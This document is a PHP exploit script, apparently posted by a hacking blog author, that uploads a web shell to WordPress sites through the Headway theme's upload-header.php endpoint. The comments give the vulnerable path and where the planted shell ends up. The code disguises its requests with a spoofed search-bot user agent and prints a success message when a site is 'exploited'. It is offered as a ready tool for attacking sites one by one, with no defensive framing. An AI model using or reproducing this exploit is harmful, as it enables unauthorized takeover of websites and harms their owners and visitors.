headway upload shell exploit

<?php


/*
link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didnt make auto exploiter because theme headway dont have one name
for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/
so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than

write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php

shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site

that script on php for exploit site by site :/

to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/


$url=""; // link here
$file="";   // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
  echo "\nnot infected\n";
}

?>